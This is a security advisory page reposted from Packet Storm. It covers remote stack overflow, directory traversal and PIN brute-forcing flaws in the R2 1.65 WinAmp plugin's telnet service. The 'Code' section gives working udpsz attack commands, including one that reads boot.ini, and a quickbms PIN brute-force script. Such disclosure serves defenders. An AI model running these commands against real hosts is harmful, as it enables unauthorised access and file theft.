exploit the possibilities

R2 1.65 Stack Overflow / Directory Traversal / Brute Forcing

R2 1.65 Stack Overflow / Directory Traversal / Brute Forcing
Posted Feb 17, 2012
Authored by Luigi Auriemma | Site aluigi.org

R2 versions 1.65 and below suffer from stack overflow, PIN brute forcing, and directory traversal vulnerabilities.

tags | exploit, overflow, vulnerability
MD5 | 89980e1bd9e80ecbc479185a8063a80d

R2 1.65 Stack Overflow / Directory Traversal / Brute Forcing

Change Mirror Download
#######################################################################

Luigi Auriemma

Application: R2
http://www.rabidhamster.org/R2/
Versions: <= 1.65
Platforms: Windows
Bugs: A] stack overflow
B] directory traversal
C] PIN brute forcing
Exploitation: remote
Date: 09 Feb 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"R2/Extreme is a plugin for the WinAmp music player. It produces
animated 3D graphics in real-time that twist and turn with the music.
Now used in nightclubs, parties, and even (apparently) a canadian
stripclub, R2 has become known for its fast, fluid visuals."


#######################################################################

=======
2) Bugs
=======


The registered version of R2 has a telnet port active by default and
uses a PIN number with a very limited range, from 1 to 9999.
The result is that it's enough to make a simple scanning of 9999 tries
to find the correct PIN and being able to exploit the following
vulnerabilites.

There are no IP bannings or other limitations, just check the "UNLOCKED"
reply to know what is the right PIN.


-----------------
A] stack overflow
-----------------

Stack overflow through the "File" command.


----------------------
B] directory traversal
----------------------

Directory traversal exploitable through the "File" command that allows
to view the files on the disk in which is installed the software.


--------------------
C] PIN brute forcing
--------------------

As explained in the introduction it's possible to brute force the PIN
number very easily being only 9999 those available.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

1234 is the default PIN number, change it accordingly with the one
found through the brute forcing scanner.

A]
udpsz -T -b a -c "1234\r\nFile([" 0 -c "])\r\n" -1 -D -3 SERVER 23 4000

B]
udpsz -T -b a -c "1234\r\nFile([../../../../../../boot.ini])" -D -3 SERVER 23 -1

C]
http://aluigi.org/papers/quickbms.zip

### beginning of the script r2_1c.bms ###
for i = 1 <= 9999
print "scan PIN %i%"
put i line
do
get TEXT line
if TEXT == "UNLOCKED"
print "PIN found: %i%"
cleanexit
endif
while TEXT != "NOT UNLOCKED"
next i
### end of the script ###

quickbms -n r2_1c.bms tcp://SERVER:23


#######################################################################

======
4) Fix
======


No fix.


#######################################################################


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close